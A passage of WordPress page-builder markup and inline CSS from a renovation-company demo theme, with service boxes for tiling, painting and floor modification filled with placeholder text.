.skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Tiling</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"ac47cadc-3d5a-40f8-bad4-2d7510e7b898\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"5babfb35-1296-4ca0-b5db-01d178d15440\"} -->\n<style type=\"text/css\"> .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Painting</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6a6f7893-59bb-4925-bdaa-e0b06bedc4e7\",\"topPadding\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"abb180d8-6220-4fbd-8b13-9b1a01abc33b\"} -->\n<style type=\"text/css\"> .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-abb180d8-6220-4fbd-8b13-9b1a01abc33b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"1dbb8474-65d4-483c-84d0-b75c10b9a9a0\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":\"2021-05-28T05:39:15.000Z\",\"filename\":\"floor-modification.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"alt\":\"\",\"title\":\"floor-modification\",\"caption\":\"\",\"description\":\"\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"id\":258,\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/floor-modification/\",\"author\":\"1\",\"name\":\"floor-modification\",\"status\":\"inherit\",\"modified\":\"2021-05-28T05:39:15.000Z\",\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"dc1b7f19b6\",\"delete\":\"1f29bf8951\",\"edit\":\"ed86f5af8b\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=258u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":9306,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":66,\"width\":111,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"height\":66,\"width\":111,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":111,\"resshowPrefix\":false,\"counterId\":\"5d2675a4-fe64-46db-a12e-a5099cf66e81\"} -->\n<style type=\"text/css\"> .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img {\n width: 111px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Floor Modification</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"673b41df-9cb3-42e4-aa60-44dea2983a99\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column{\n padding-top: 